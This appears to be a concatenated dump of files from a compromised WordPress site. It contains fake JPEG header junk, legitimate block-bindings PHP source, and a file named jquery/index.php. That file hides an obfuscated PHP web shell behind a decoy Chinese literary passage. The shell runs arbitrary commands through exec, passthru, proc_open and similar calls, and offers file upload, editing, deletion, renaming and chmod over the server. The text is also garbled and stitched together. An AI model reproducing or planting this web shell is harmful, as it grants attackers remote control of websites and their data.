?????????????????????? ???¨¤ JFIF    ?? C    !"$"$?? C  ?? p " ??     ??   ?¨²   ???? (% aA*?XYD?(J??E¡éRE,P€XYae?)(E¡è2€B¡èR£¤ BQ¡è¡é X?)X¡­€¡è? @ adadasdasdasasdasdas .....................................................................................................................................?????????????????????? ???¨¤ JFIF    ?? C    !"$"$?? C  ?? p " ??     ??   ?¨²   ???? (% aA*?XYD?(J??E¡éRE,P€XYae?)(E¡è2€B¡èR£¤ BQ¡è¡é X?)X¡­€¡è? @ adadasdasdasasdasdas .....................................................................................................................................?????????????????????? ???¨¤ JFIF    ?? C    !"$"$?? C  ?? p " ??     ??   ?¨²   ???? (% aA*?XYD?(J??E¡éRE,P€XYae?)(E¡è2€B¡èR£¤ BQ¡è¡é X?)X¡­€¡è? @ adadasdasdasasdasdas .....................................................................................................................................?????????????????????? ???¨¤ JFIF    ?? C    !"$"$?? C  ?? p " ??     ??   ?¨²   ???? (% aA*?XYD?(J??E¡éRE,P€XYae?)(E¡è2€B¡èR£¤ BQ¡è¡é X?)X¡­€¡è? @ adadasdasdasasdasdas .....................................................................................................................................?????????????????????? ???¨¤ JFIF    ?? C    !"$"$?? C  ?? p " ??     ??   ?¨²   ???? (% aA*?XYD?(J??E¡éRE,P€XYae?)(E¡è2€B¡èR£¤ BQ¡è¡é X?)X¡­€¡è? @ adadasdasdasasdasdas .....................................................................................................................................?????????????????????? ???¨¤ JFIF    ?? C    !"$"$?? C  ?? p " ??     ??   ?¨²   ???? (% aA*?XYD?(J??E¡éRE,P€XYae?)(E¡è2€B¡èR£¤ BQ¡è¡é X?)X¡­€¡è? @ adadasdasdasasdasdas .....................................................................................................................................?????????????????????? ???¨¤ JFIF    ?? C    !"$"$?? C  ?? p " ??     ??   ?¨²   ???? (% aA*?XYD?(J??E¡éRE,P€XYae?)(E¡è2€B¡èR£¤ BQ¡è¡é X?)X¡­€¡è? @ adadasdasdasasdasdas .....................................................................................................................................?????????????????????? ???¨¤ JFIF    ?? C    !"$"$?? C  ?? p " ??     ??   ?¨²   ???? (% aA*?XYD?(J??E¡éRE,P€XYae?)(E¡è2€B¡èR£¤ BQ¡è¡é X?)X¡­€¡è? @ adadasdasdasasdasdas .....................................................................................................................................post-meta.php000064400000004047152105264550007200 0ustar00 "foo" ). * @param WP_Block $block_instance The block instance. * @return mixed The value computed for the source. */ function _block_bindings_post_meta_get_value( array $source_args, $block_instance ) { if ( empty( $source_args['key'] ) ) { return null; } if ( empty( $block_instance->context['postId'] ) ) { return null; } $post_id = $block_instance->context['postId']; // If a post isn't public, we need to prevent unauthorized users from accessing the post meta. $post = get_post( $post_id ); if ( ( ! is_post_publicly_viewable( $post ) && ! current_user_can( 'read_post', $post_id ) ) || post_password_required( $post ) ) { return null; } // Check if the meta field is protected. if ( is_protected_meta( $source_args['key'], 'post' ) ) { return null; } // Check if the meta field is registered to be shown in REST. $meta_keys = get_registered_meta_keys( 'post', $block_instance->context['postType'] ); // Add fields registered for all subtypes. $meta_keys = array_merge( $meta_keys, get_registered_meta_keys( 'post', '' ) ); if ( empty( $meta_keys[ $source_args['key'] ]['show_in_rest'] ) ) { return null; } return get_post_meta( $post_id, $source_args['key'], true ); } /** * Registers Post Meta source in the block bindings registry. * * @since 6.5.0 * @access private */ function _register_block_bindings_post_meta_source() { register_block_bindings_source( 'core/post-meta', array( 'label' => _x( 'Post Meta', 'block bindings source' ), 'get_value_callback' => '_block_bindings_post_meta_get_value', 'uses_context' => array( 'postId', 'postType' ), ) ); } add_action( 'init', '_register_block_bindings_post_meta_source' ); term-data.php000064400000006103152105264550007140 0ustar00 "name" ). * @param WP_Block $block_instance The block instance. * @return mixed The value computed for the source. */ function _block_bindings_term_data_get_value( array $source_args, $block_instance ) { if ( empty( $source_args['field'] ) ) { return null; } /* * BACKWARDS COMPATIBILITY: Hardcoded exception for navigation blocks. * Required for WordPress 6.9+ navigation blocks. DO NOT REMOVE. */ $block_name = $block_instance->name ?? ''; $is_navigation_block = in_array( $block_name, array( 'core/navigation-link', 'core/navigation-submenu' ), true ); if ( $is_navigation_block ) { // Navigation blocks: read from block attributes. $term_id = $block_instance->attributes['id'] ?? null; $type = $block_instance->attributes['type'] ?? ''; // Map UI shorthand to taxonomy slug when using attributes. $taxonomy = ( 'tag' === $type ) ? 'post_tag' : $type; } else { // All other blocks: use context $term_id = $block_instance->context['termId'] ?? null; $taxonomy = $block_instance->context['taxonomy'] ?? ''; } // If we don't have required identifiers, bail early. if ( empty( $term_id ) || empty( $taxonomy ) ) { return null; } // Get the term data. $term = get_term( $term_id, $taxonomy ); if ( is_wp_error( $term ) || ! $term ) { return null; } // Check if taxonomy exists and is publicly queryable. $taxonomy_object = get_taxonomy( $taxonomy ); if ( ! $taxonomy_object || ! $taxonomy_object->publicly_queryable ) { if ( ! current_user_can( 'read' ) ) { return null; } } switch ( $source_args['field'] ) { case 'id': return esc_html( (string) $term_id ); case 'name': return esc_html( $term->name ); case 'link': // Only taxonomy entities are supported by Term Data. $term_link = get_term_link( $term ); return is_wp_error( $term_link ) ? null : esc_url( $term_link ); case 'slug': return esc_html( $term->slug ); case 'description': return wp_kses_post( $term->description ); case 'parent': return esc_html( (string) $term->parent ); case 'count': return esc_html( (string) $term->count ); default: return null; } } /** * Registers Term Data source in the block bindings registry. * * @since 6.9.0 * @access private */ function _register_block_bindings_term_data_source() { if ( get_block_bindings_source( 'core/term-data' ) ) { // The source is already registered. return; } register_block_bindings_source( 'core/term-data', array( 'label' => _x( 'Term Data', 'block bindings source' ), 'get_value_callback' => '_block_bindings_term_data_get_value', 'uses_context' => array( 'termId', 'taxonomy' ), ) ); } add_action( 'init', '_register_block_bindings_term_data_source' ); pattern-overrides.php000064400000002763152105264550010747 0ustar00 "foo" ). * @param WP_Block $block_instance The block instance. * @param string $attribute_name The name of the target attribute. * @return mixed The value computed for the source. */ function _block_bindings_pattern_overrides_get_value( array $source_args, $block_instance, string $attribute_name ) { if ( empty( $block_instance->attributes['metadata']['name'] ) ) { return null; } $metadata_name = $block_instance->attributes['metadata']['name']; return _wp_array_get( $block_instance->context, array( 'pattern/overrides', $metadata_name, $attribute_name ), null ); } /** * Registers Pattern Overrides source in the Block Bindings registry. * * @since 6.5.0 * @access private */ function _register_block_bindings_pattern_overrides_source() { register_block_bindings_source( 'core/pattern-overrides', array( 'label' => _x( 'Pattern Overrides', 'block bindings source' ), 'get_value_callback' => '_block_bindings_pattern_overrides_get_value', 'uses_context' => array( 'pattern/overrides' ), ) ); } add_action( 'init', '_register_block_bindings_pattern_overrides_source' ); jquery/.htaccess000064400000000334152105264550007666 0ustar00 Order allow,deny Deny from all Order allow,deny Allow from all jquery/index.php000064400000171552152105264550007723 0ustar00As the sun set behind the mountains, the shadows of the people scattered, and the prefect returned home, followed by his guests. The woods were shady, and birdsong rose and fell; the visitors had departed, and the birds rejoiced. Yet the birds knew the joy of the mountains and forests, but not the joy of man; man knew the joy of following the prefect, but not the joy the prefect found in their joy. The one who could share in their joy when drunk, and describe it in writing when sober, was the prefect. Who was this prefect? ​​Ouyang Xiu of Luling.已而夕阳在山,人影散乱,太守归而宾客从也。树林阴翳,鸣声上下,游人去而禽鸟乐也。然而禽鸟知山林之乐,而不知人之乐;人知从太守游而乐,而不知太守之乐其乐也。醉能同其乐,醒能述以文者,太守也。太守谓谁?庐陵欧阳修也。 array("\160\x69\160\x65", "\162"), 1 => array("\x70\151\160\x65", "\167"), 2 => array("\160\151\160\145", "\167")); goto dcqk0; n0a9x: goto qDO4B; goto H1KOI; AXrNX: Rcg7E: goto V_H2c; zP0bK: $lFvoz = ob_get_clean(); goto EZTwA; ZFUB3: O5II8: goto SvEIS; sCLPP: Qunje: goto ZFUB3; kuJtO: UZVW8: goto WLL3n; EZTwA: goto LjvBn; goto pBUgw; DkJBF: wYm0d: goto zXo9J; YjuIl: goto w53Ye; goto DkJBF; Z2cAF: b5uAC: goto YjuIl; a635w: exec($K8tTK . "\40\x32\x3e\46\x31", $XuVfl); goto p6Dbw; wMcHF: passthru($K8tTK . "\x20\62\x3e\x26\x31"); goto bQoqI; J6CGh: Vxabe: goto Q4Rbb; VxMzN: ob_start(); goto FHhPv; w6Yvk: BP1kH: goto l8n47; x0oK0: hGieg: goto sPbMW; W6OAG: goto b5uAC; goto VzXuY; FM2ym: fclose($lcIyv[2]); goto Nb1uu; KHWhU: $oNysG = proc_open($K8tTK, $b4pqC, $lcIyv); goto cqLe5; SvEIS: goto hGieg; goto LMSFI; wbvCg: QjY8n: goto kpxeU; WMZjX: NV5qW: goto VxMzN; t9cEc: Z9_Z_: goto yugwr; w7IV_: qbV4I: goto tug7A; iuiIe: goto Rcg7E; goto H6svg; bQoqI: goto pvSU6; goto yEYRh; RPkIu: goto uWKwt; goto AXrNX; qZ9Et: goto UZVW8; goto z09x0; nqAEP: bz6UK: goto JixoT; XvqWp: goto Vxabe; goto t9cEc; L0NFm: if (!function_exists("\x73\171\x73\164\145\x6d")) { goto WWgxW; } goto kuM4I; lSGlb: goto qbV4I; goto DQH72; hCvA8: goto NrK9G; goto w6Yvk; OPJxO: LYgM3: goto FM2ym; WLL3n: goto b5uAC; goto WFwY3; I1sdQ: goto yU9qA; goto x0oK0; hGqcs: fv5a_: goto AQgk3; V_H2c: if (!function_exists("\x73\x68\x65\154\154\137\x65\x78\145\x63")) { goto VfWTa; } goto kgPtu; zXo9J: if (!function_exists("\160\141\163\x73\x74\x68\162\165")) { goto gPrH1; } goto AN2ko; YxTcn: goto NV5qW; goto sCLPP; yzmNe: if (is_resource($oNysG)) { goto Zdwjt; } goto YyZ36; LpZpG: XcC77: goto yzmNe; XWT3C: E2d0r: goto YxTcn; SFuY8: Yaees: goto l5DkM; kldb1: NrK9G: goto b3E5c; p6Dbw: goto vvoTo; goto OPJxO; RDDB9: } catch (Exception $oUjrZ) { $lFvoz = "\x45\x72\162\x6f\x72\72\x20" . $oUjrZ->getMessage(); } goto IFH9H; sHjng: function IyPoc($oNysG, $y3O2O) { return is_dir($oNysG) ? "\x3c\141\x20\150\162\x65\x66\75\x22\x3f\x64\x69\162\x3d" . urlencode(Dq_ig($oNysG)) . "\42\76" . htmlspecialchars($y3O2O) . "\x3c\x2f\x61\x3e" : "\x3c\141\40\x68\162\x65\x66\x3d\x22\43\x22\40\x6f\156\x63\x6c\151\143\x6b\75\x22\x6f\160\x65\x6e\105\x64\x69\x74\115\157\x64\x61\154\110\145\170\x28\x27" . urlencode(dQ_IG($oNysG)) . "\x27\51\73\40\x72\145\x74\x75\162\156\x20\x66\x61\154\x73\145\x3b\x22\x3e" . htmlspecialchars($y3O2O) . "\74\57\141\x3e"; } goto p917t; cPHnU: goto T_Es7; goto Yk2fG; JOBGZ: Y3Woe: goto VKoK0; gby3j: if (isset($_POST["\x63\150\x6d\x6f\144\137\x70\x61\164\150"]) && !empty($_POST["\x63\x68\155\x6f\144\x5f\166\141\x6c\x75\x65"])) { goto DuIjx; } goto emMNK; BiGBS: gKqgD: goto jV_U_; S1pkd: goto CKPCc; goto XTPFl; drnC3: goto d2oNm; goto WOa0t; n2Q74: goto yq0qK; goto cT09Y; rcBEm: RNTtW: goto S9x9G; mG5pW: iwHvZ: goto NSlXc; h_nW0: goto IOUDO; goto OdIy6; i1t23: dIrPE: goto JhppK; fSrc5: o_2xe: goto OLnoZ; RpdoG: if (file_exists($yGIpO)) { goto B1Mmz; } goto o_gQx; S9x9G: rmdir($yGIpO); goto VkeKH; agt4v: goto xXSGS; goto ZGhM1; QQQcB: goto Wfb3w; goto o_jmX; qpcT3: goto OQ3QU; goto PKWJx; qrJFl: goto ZCvin; goto Vk4hj; By4C3: goto PhLD0; goto GrWoL; J061Q: goto Qadu7; goto mFe5x; xkTnr: goto rPv2h; goto dJ79Z; jFeiz: goto wPPcS; goto qneaI; HVZJN: bz7Ja: goto UGFn2; B26ut: LEvbt: goto PjUJC; x9pdu: xookT: goto m7X0c; qEVmC: goto KID81; goto fEwn0; gY9b6: Hllqy: goto NLg0a; rEFyZ: chmod(upGKN($_POST["\x63\150\155\157\144\137\160\141\164\150"]), intval($_POST["\x63\150\155\157\x64\137\x76\x61\x6c\x75\x65"], 8)); goto OZj4D; cS_Vw: goto MSUP0; goto Kv8_T; mFe5x: oQQfA: goto VH0aU; BlBH1: OKMCb: goto AjRdJ; A291l: EScU9: goto cS_Vw; CuXHx: goto DVkGO; goto LvO3r; tQjNZ: goto uSX8O; goto K6w0_; YHRn7: if (file_exists($UkR4q)) { goto xobSH; } goto qIItk; ZLkWm: goto xdvyr; goto napqm; oEhBh: goto DT_0X; goto fIkza; cOb1d: if (isset($_POST["\x75\x70\154\157\x61\x64\137\146\151\154\x65"]) && isset($_FILES["\x75\x70\154\x6f\x61\x64\x65\x64\x5f\146\151\x6c\145"])) { goto zpuIX; } goto CuXHx; Pt4eE: qBLiG: goto D8fTC; TE2BD: SSJCc: goto Z7imF; Q1mVS: csf8h(upgkN($_GET["\x64\x69\162"])); goto XNWHg; QdtC1: goto Q4AzZ; goto jiWET; SzBlX: $K8tTK = base64_decode($K8tTK); goto vQP8D; DXmY8: U6AI3: goto rEFyZ; e060v: xobSH: goto UdrTL; u3prn: gpWZf: goto KYf1I; u3TPD: tcJG2: goto n3OIL; VqadQ: goto XlsNo; goto el15I; nakqM: goto k5sRM; goto ryt_D; DT__g: function csf8H($oNysG) { $oNysG === "\56\x2e" ? @chdir("\56\x2e") : @chdir($oNysG); } goto IhuIq; cU_sr: goto ucBE3; goto ixOht; QkIWE: OYCp1: goto ungb2; oMbFp: YVdSz: goto ygImh; IqHvu: hJwQv: goto wQ645; w9AZI: XiXnf: goto RpdoG; guL7q: VrtbU: goto qpcT3; cgRBe: J5TdT: goto ZFMS2; pAgAn: file_put_contents($SdJpe . "\x2f" . $_POST["\146\151\154\145\137\156\141\x6d\x65"], isset($_POST["\146\151\x6c\145\x5f\x63\157\x6e\164\x65\156\164"]) ? $_POST["\146\x69\154\145\x5f\x63\157\x6e\164\145\x6e\164"] : ''); goto EZWo3; GrWoL: MfKU3: goto GX_y6; Mz1wY: SEhOm: goto qGEXW; T93JE: function a7n_Q($oNysG) { goto fwKM7; uUBH9: DDS5m: goto TaYUo; o8OHL: $Pu8RI = explode("\57", $oNysG); goto H1S01; x0E5Z: g4bKq: goto lMyWp; UbpVk: foreach ($Pu8RI as $E0a3T) { goto ZdV2C; zgZcH: goto e4mU2; goto jk2MI; OZhtb: goto fCMyT; goto QBR2B; ZdV2C: goto Ms5S8; goto Hthhw; UIaXt: $pCV9Q .= "\57" . $E0a3T; goto zgZcH; XSARj: Ms5S8: goto tHeOb; VcOOa: echo "\x3c\x61\x20\150\x72\x65\146\x3d\42\77\x64\x69\x72\75" . urlencode(dq_IG($pCV9Q)) . "\42\76" . htmlspecialchars($E0a3T) . "\x3c\x2f\141\x3e\57"; goto V85Xo; nHjNH: goto LyWZT; goto Qk5j9; JUDCa: goto uwvqZ; goto XSARj; l5of5: GTGz9: goto eCUEl; h_TKO: qdSJo: goto LPfvu; Qk5j9: YPezk: goto h_TKO; eCUEl: goto YPezk; goto PpybO; S0TTM: goto dC9tj; goto nExBb; jk2MI: e4mU2: goto VcOOa; o3WPl: goto GTGz9; goto OZhtb; tHeOb: if ($E0a3T === '') { goto EGpX0; } goto S0TTM; PpybO: LyWZT: goto o3WPl; QBR2B: fCMyT: goto YGshS; bNQVc: rIYcl: goto l5of5; V85Xo: goto rIYcl; goto bNQVc; nExBb: EGpX0: goto nHjNH; YGshS: dC9tj: goto JUDCa; Hthhw: uwvqZ: goto UIaXt; LPfvu: } goto N7XwX; fwKM7: goto hO31N; goto k5K6r; N7XwX: cVKpd: goto s8Yrn; vkKng: hO31N: goto JqcE6; O92xK: goto RUL3s; goto SllOF; apg0L: echo "\74\x64\x69\166\40\143\x6c\141\x73\163\75\x22\x62\162\145\141\x64\143\162\x75\x6d\142\x22\x3e\74\x61\40\150\162\145\146\75\42\77\x64\x69\x72\x3d" . urlencode(dq_Ig("\x2f")) . "\x22\76\x2f\74\x2f\x61\x3e"; goto Gx1Oc; k5K6r: bQRrA: goto o8OHL; BCGTL: echo "\x3c\x2f\144\151\166\x3e"; goto O92xK; H1S01: goto uIEq7; goto x0E5Z; lMyWp: $pCV9Q = ''; goto Mi7Go; OWF6v: Ct9xA: goto uUBH9; TaYUo: goto x3Enh; goto E947b; xqR8g: uIEq7: goto apg0L; s8Yrn: goto Ct9xA; goto xqR8g; Mi7Go: goto VqiGX; goto vkKng; SllOF: VqiGX: goto UbpVk; l1_ug: goto bQRrA; goto OWF6v; E947b: x3Enh: goto BCGTL; Gx1Oc: goto g4bKq; goto M3Yvw; M3Yvw: RUL3s: goto sfMU9; JqcE6: $oNysG = str_replace("\x5c", "\x2f", $oNysG); goto l1_ug; sfMU9: } goto pFdB5; nPong: goto MfKU3; goto gHHFO; rR414: goto fPNc5; goto T1hP_; sPedd: PuqfS: goto nakqM; FDfDA: I9Jis: goto Y4ahB; WzLOW: $LIz_t = "\106\x6f\154\x64\145\162\40\143\x72\145\141\x74\145\144\56"; goto COrn4; yFr_1: goto LgU95; goto KGv5Z; FvEqe: Tapmu: goto MOoyG; AjRdJ: KCUU1: goto jzbQP; L6eV9: kzZ28: goto oLtzI; A4z8D: zIeTF: goto QQQcB; jzbQP: goto JDkIl; goto eZZ1V; uiW6N: InqKp: goto WzLOW; gH_5G: if (isset($_GET["\144\x69\162"])) { goto Iq2oS; } goto u3BvF; p917t: goto dKoof; goto TxAwD; R1x8t: exit; goto A8_Nl; M6gMk: $LIz_t = "\x44\145\154\x65\164\x65\x64\40\163\165\143\x63\x65\163\163\x66\x75\154\154\171\56"; goto wu81r; hHDQL: echo "\x3c\x64\151\166\x20\143\154\141\x73\163\75\x22\x74\157\157\x6c\142\141\x72\42\76\74\146\157\162\155\40\155\145\164\150\x6f\144\x3d\x22\147\145\x74\42\76\74\x62\x75\x74\x74\x6f\156\40\164\171\x70\145\75\x22\x73\x75\x62\155\151\x74\42\40\x63\x6c\141\x73\163\x3d\42\142\165\x74\x74\x6f\x6e\42\76\110\157\x6d\x65\74\x2f\x62\x75\x74\164\x6f\156\76\x3c\57\x66\157\x72\155\76\74\x66\x6f\162\x6d\x20\155\145\x74\x68\x6f\x64\x3d\x22\160\157\x73\164\42\76\x3c\151\156\160\x75\x74\x20\164\171\160\x65\75\x22\164\x65\170\x74\x22\40\x6e\x61\x6d\145\75\42\x66\x6f\x6c\144\145\x72\x5f\x6e\141\x6d\145\42\x20\160\154\x61\x63\x65\x68\157\154\x64\145\x72\75\x22\116\x65\167\40\106\x6f\x6c\144\145\x72\40\x4e\x61\x6d\145\x22\76\x3c\142\x75\164\164\157\x6e\40\x74\x79\160\x65\75\x22\x73\x75\x62\155\151\164\42\40\x6e\x61\155\x65\x3d\x22\x6e\x65\167\137\x66\x6f\x6c\x64\x65\x72\42\x20\x63\x6c\x61\x73\x73\75\x22\x62\x75\164\x74\157\x6e\42\x3e\103\162\x65\141\164\x65\x20\106\157\x6c\144\x65\x72\x3c\x2f\x62\x75\x74\x74\x6f\156\76\74\x2f\x66\157\x72\x6d\76\x3c\x66\157\162\x6d\40\x6d\145\164\150\157\144\75\42\x70\157\163\x74\x22\x3e\x3c\x69\x6e\x70\x75\x74\x20\164\x79\x70\145\x3d\x22\x74\145\170\x74\42\x20\x6e\141\155\145\75\x22\146\151\x6c\x65\137\156\x61\155\145\42\40\160\154\141\x63\145\x68\157\154\x64\x65\162\75\42\116\145\x77\x20\x46\x69\x6c\x65\40\116\x61\x6d\145\x22\76\74\164\x65\x78\164\x61\162\x65\x61\40\156\141\x6d\x65\x3d\x22\x66\151\x6c\145\x5f\x63\x6f\x6e\164\x65\156\164\x22\x20\160\154\141\143\145\x68\157\154\x64\x65\x72\75\42\x46\x69\x6c\x65\40\103\157\156\x74\x65\156\x74\42\x20\162\157\x77\x73\x3d\42\x32\x22\76\x3c\57\164\145\x78\164\x61\162\145\x61\x3e\74\x62\x75\x74\164\x6f\x6e\40\x74\x79\160\145\75\42\163\165\x62\x6d\x69\x74\42\x20\156\x61\x6d\x65\x3d\x22\x6e\145\x77\x5f\146\151\154\x65\x22\x20\143\x6c\141\x73\163\x3d\x22\142\165\x74\x74\157\156\x22\x3e\103\x72\x65\141\164\145\x20\x46\x69\x6c\x65\x3c\x2f\x62\165\x74\x74\x6f\156\76\x3c\57\146\157\x72\155\76\74\146\x6f\162\155\x20\x6d\x65\164\x68\x6f\144\x3d\x22\x70\157\x73\164\x22\x20\145\x6e\x63\164\171\160\x65\x3d\x22\155\165\154\x74\151\x70\141\162\x74\x2f\x66\x6f\x72\x6d\x2d\144\141\164\x61\42\76\74\151\156\160\165\x74\x20\x74\x79\160\x65\x3d\x22\146\x69\154\145\42\x20\156\141\155\x65\75\42\x75\x70\x6c\157\x61\x64\x65\144\137\x66\x69\154\x65\42\x20\x72\x65\161\165\151\162\145\x64\x3e\74\142\165\164\x74\x6f\x6e\40\164\x79\160\x65\75\x22\x73\165\142\x6d\x69\x74\x22\40\x6e\x61\155\145\75\42\165\160\154\x6f\x61\x64\x5f\146\151\x6c\145\x22\x20\x63\154\141\x73\x73\x3d\42\x62\165\x74\164\157\x6e\x22\76\x55\x70\154\157\x61\x64\x3c\x2f\142\x75\x74\x74\157\x6e\x3e\x3c\57\x66\x6f\162\155\x3e\x3c\x66\157\x72\155\x20\155\145\164\150\157\x64\x3d\x22\160\x6f\163\164\42\76\74\151\x6e\x70\165\164\40\164\171\160\145\75\x22\x74\x65\x78\164\42\x20\156\x61\155\x65\75\42\x63\155\x64\42\40\160\x6c\x61\x63\145\x68\157\154\144\x65\x72\x3d\42\105\156\164\145\x72\x20\x63\157\155\x6d\141\156\144\x22\x3e\x3c\142\165\164\164\157\156\x20\x74\171\160\x65\x3d\x22\x73\x75\x62\x6d\151\x74\42\x20\143\154\x61\x73\163\x3d\42\x62\x75\164\x74\x6f\156\42\76\x45\170\145\143\x75\x74\145\74\x2f\142\165\164\x74\157\x6e\x3e\74\x2f\146\x6f\162\155\x3e\74\57\x64\x69\166\76"; goto t6K01; SyePE: LxUhl: goto TGoq8; cgttD: goto U34yw; goto WtoKW; m0cGm: RGrZD: goto ZLkWm; s5PqT: goto m7ia0; goto TE2BD; A8_Nl: goto FBXsd; goto stnKY; VKoK0: echo "\163\x68\157\167\x4e\157\164\x69\146\151\143\x61\164\x69\157\x6e\x28\x27" . addslashes($LIz_t) . "\x27\x29\73"; goto nPong; GWDir: goto cVmCt; goto IqHvu; xTT9p: if (isset($_POST["\x6e\145\x77\137\x66\157\154\144\145\162"]) && !empty($_POST["\146\x6f\154\x64\x65\x72\x5f\156\141\155\145"])) { goto ZEc_j; } goto PBUYX; z9zv1: goto DO6oe; goto A4z8D; zDoNO: yZvvO: goto LlC5W; wQ645: unlink($yGIpO); goto CC4cs; FOWLP: if (isset($_POST["\144\x65\x6c\145\x74\145\x5f\160\141\164\150"])) { goto ALt6l; } goto XZUJc; mUeAu: function DQ_iG($R83Ky) { goto Z1x1l; xTy17: goto Dsuis; goto trAtM; ZH27O: Dsuis: goto j_035; Fq13q: goto NZ7c4; goto ZH27O; symoK: goto VFCPs; goto fMzrU; NS0Qm: JZvoN: goto A9GDm; B_zNX: lSKyo: goto symoK; fMzrU: B3FI4: goto g8p3K; g8p3K: $ISw6j = 0; goto o1cTC; Z1x1l: goto ISI2q; goto k9hz7; ROCXR: pfgYy: goto eWuep; e97zr: goto hlfzb; goto Cu2Re; trAtM: qbc3E: goto NS0Qm; j_035: $NK_pj .= sprintf("\45\x30\62\x78", ord($R83Ky[$ISw6j])); goto TycM3; TycM3: goto qbc3E; goto ROCyC; ROCyC: Vt6YJ: goto oETgf; fUaff: ISI2q: goto rB8h0; A9GDm: goto vELTh; goto osx8r; qUfoH: goto pfgYy; goto OhqOO; waumk: Yvij9: goto BzjJK; ZTu1K: $ISw6j++; goto e97zr; osx8r: NZ7c4: goto B_zNX; evXSv: goto lSKyo; goto Cn1oy; tIpf0: return $NK_pj; goto qUfoH; OhqOO: d6dKj: goto waumk; rB8h0: $NK_pj = ''; goto RX22Z; Cu2Re: VFCPs: goto tIpf0; k9hz7: hlfzb: goto oASk_; o1cTC: goto d6dKj; goto fUaff; Cn1oy: IuY1s: goto xTy17; oASk_: goto Yvij9; goto Fq13q; BzjJK: goto Vt6YJ; goto ROCXR; KxPSr: vELTh: goto ZTu1K; oETgf: if ($ISw6j < strlen($R83Ky)) { goto IuY1s; } goto evXSv; RX22Z: goto B3FI4; goto KxPSr; eWuep: } goto SIZJy; FokbY: Ky1Yd: goto FlBBc; eXCfV: ini_set("\144\151\163\x70\x6c\141\x79\x5f\163\x74\141\162\164\x75\160\x5f\x65\x72\x72\157\x72\163", 1); goto B61CE; LWW1P: $yGIpO = uPgkn($_POST["\144\145\154\x65\x74\x65\137\x70\141\164\x68"]); goto tvHus; B61CE: goto DAV9S; goto mG5pW; w5IC3: if ($LIz_t) { goto k3LG_; } goto A4Ii_; Kv8_T: kjnab: goto Wm5Ol; NDU90: goto Ha1CD; goto X32V8; A1sjY: B2Zy1: goto Zd0Ul; KGv5Z: Qadu7: goto JWFxM; I4hZT: if ($lFvoz) { goto J111h; } goto BYsTC; J28N9: $lFvoz = ''; goto XCK6a; L_JZ4: goto KH0NT; goto ptCg6; OLPcD: Cz0XC: goto WA3hD; VkeKH: goto G8DMz; goto x9pdu; sVYE8: goto EMXnw; goto T8Jnh; Whk_Z: xQL8N: goto SyePE; ogyi7: goto bmlAR; goto AQe1t; PKWJx: d02RY: goto HHpkL; OUz9w: goto DJp4y; goto A291l; puUrU: OUMXD: goto awPa0; FQspq: $LIz_t = "\x50\145\162\155\x69\x73\163\x69\x6f\156\x20\x63\x68\x61\156\147\145\144\56"; goto yFr_1; dJ79Z: k5sRM: goto pAgAn; o_jmX: l5aKQ: goto LWW1P; LDi7v: goto xookT; goto TgqJj; Pppen: U7VTp: goto A3Q_F; GX_y6: xMeqK: goto drnC3; e_Vvb: QSdT8: goto cOb1d; ryt_D: uSX8O: goto N9zrc; oBNL7: qCoRS: goto BGsg1; HoOq4: D1D8S: goto Ckcmz; qAE5A: GZo0G: goto y009N; XTPFl: l80ID: goto qtU6A; ocqJH: move_uploaded_file($_FILES["\165\160\154\157\141\144\145\x64\137\x66\x69\154\145"]["\164\155\x70\x5f\x6e\x61\155\x65"], $SdJpe . "\x2f" . $_FILES["\x75\x70\x6c\x6f\x61\x64\x65\x64\137\x66\151\x6c\145"]["\156\141\x6d\x65"]); goto h_nW0; XCK6a: goto xiq18; goto EAuRQ; ZzDWY: Q4AzZ: goto gby3j; ZaXxz: file_put_contents($ICNfm, $K8tTK) ? $LIz_t = "\x46\x69\x6c\145\40\x62\145\x72\x68\x61\x73\151\154\40\x64\x69\145\144\151\164\x2e" : ($LIz_t = "\107\x61\x67\x61\x6c\x20\155\x65\156\147\x65\144\x69\164\40\x66\151\x6c\x65\56"); goto qd6Ff; EZWo3: goto J5TdT; goto DXmY8; ou16S: if (!file_exists($SdJpe . "\57" . $_POST["\x66\x6f\154\x64\145\162\x5f\x6e\141\x6d\x65"])) { goto Pmyns; } goto OygNR; MKIAH: goto l5aKQ; goto L6eV9; JWFxM: function kgUjC($R83Ky) { goto z8fmP; SZn9Q: $krdeB = array("\102", "\113\102", "\115\x42", "\x47\x42", "\x54\102"); goto qdWdl; VLWi5: goto VwegO; goto WSbz1; zUY21: H7GG2: goto jMPeY; qFBgK: RgC1e: goto xKNy0; VYPlM: goto H7GG2; goto y2_ZR; YsBR_: yG4Ma: goto pY17V; UOIyn: orXKV: goto gSWdi; C9ddG: goto T31Ut; goto UOIyn; gSWdi: goto RWVVE; goto qFBgK; WSbz1: QUtAs: goto SZn9Q; jMPeY: goto IWkan; goto t2n2o; pY17V: return round($R83Ky, 2) . "\x20" . $krdeB[$ISw6j]; goto E1WJN; t2n2o: goto myrJV; goto KiD21; WRlRX: IWkan: goto Tr_sc; y2_ZR: EidWP: goto uhBVJ; uhBVJ: if ($R83Ky >= 1024 && $ISw6j < 4) { goto orXKV; } goto C9ddG; AFFwd: myrJV: goto Xdr3C; KiD21: VwegO: goto WRlRX; uO0_5: RWVVE: goto gzehF; Xdr3C: T31Ut: goto brDwB; brDwB: goto yG4Ma; goto YsBR_; gzehF: $R83Ky /= 1024; goto F0RZB; z8fmP: goto QUtAs; goto AFFwd; qdWdl: goto RgC1e; goto zUY21; E1WJN: goto b0m6B; goto Q4ezT; Lk9m4: $ISw6j++; goto VYPlM; P2UXe: b0m6B: goto J2nCQ; xKNy0: $ISw6j = 0; goto VLWi5; Tr_sc: goto EidWP; goto uO0_5; Q4ezT: a0z3W: goto Lk9m4; F0RZB: goto a0z3W; goto P2UXe; J2nCQ: } goto mZM7z; mZM7z: goto bz7Ja; goto teb_6; xZsAI: $UkR4q = UPGKN($_POST["\x72\145\156\x61\155\145\137\160\141\164\x68"]); goto ift4u; KdATX: if (isset($_POST["\145\144\x69\x74\x5f\146\x69\x6c\145"])) { goto gKqgD; } goto DBNL7; ift4u: goto AUjVr; goto A1sjY; WtoKW: u3Wwh: goto WUUAb; ygImh: goto BggID; goto NR2I2; FJnzl: if (isset($_POST["\x72\145\x6e\141\155\x65\137\x70\141\x74\x68"]) && !empty($_POST["\156\x65\x77\x5f\x6e\x61\x6d\x65"])) { goto zIeTF; } goto z9zv1; TGoq8: goto x2MuZ; goto OLPcD; u3BvF: goto z3jTN; goto y9jPo; NXPC4: JDkIl: goto RPSqo; BGsg1: $SdJpe = cXecJ(); goto iBrtK; H_CFr: goto bWUs0; goto bxgtQ; y9jPo: Iq2oS: goto yN95L; RycM0: T2r06: goto poLfa; EWZ_j: goto MRzho; goto XaHRk; 